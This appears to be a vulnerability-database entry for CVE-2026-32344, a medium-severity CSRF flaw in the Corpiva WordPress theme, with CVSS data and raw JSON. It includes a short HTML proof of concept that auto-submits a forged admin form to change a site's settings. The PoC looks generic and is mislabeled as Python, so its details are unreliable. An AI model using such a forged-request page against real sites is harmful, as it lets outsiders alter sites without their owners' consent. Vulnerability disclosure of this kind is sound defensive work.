Security Vulnerability Report
中文
CVE-2026-32344 CVSS 4.3 MEDIUM

CVE-2026-32344

Published: 2026-03-13 19:54:46
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in desertthemes Corpiva corpiva allows Cross Site Request Forgery.This issue affects Corpiva: from n/a through <= 1.0.96.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Corpiva主题 <= 1.0.96
Corpiva主题 所有版本(from n/a through 1.0.96)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32344 - Corpiva Theme CSRF --> <html> <body> <h1>CVE-2026-32344 CSRF PoC</h1> <p>This PoC demonstrates a CSRF vulnerability in Corpiva theme <= 1.0.96</p> <p>诱骗管理员修改主题设置或执行管理员操作</p> <!-- 示例:修改网站设置 --> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="save_theme_settings" /> <input type="hidden" name="setting_name" value="site_title" /> <input type="hidden" name="setting_value" value="Hacked by CSRF" /> <input type="hidden" name="csrf_token" value="" /> </form> <script> // 自动提交表单(无用户交互) document.getElementById('csrf-form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32344", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:45.957", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in desertthemes Corpiva corpiva allows Cross Site Request Forgery.This issue affects Corpiva: from n/a through <= 1.0.96."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en desertthemes Corpiva corpiva permite la falsificación de petición en sitios cruzados. Este problema afecta a Corpiva: desde n/a hasta &lt;= 1.0.96."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/corpiva/vulnerability/wordpress-corpiva-theme-1-0-96-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}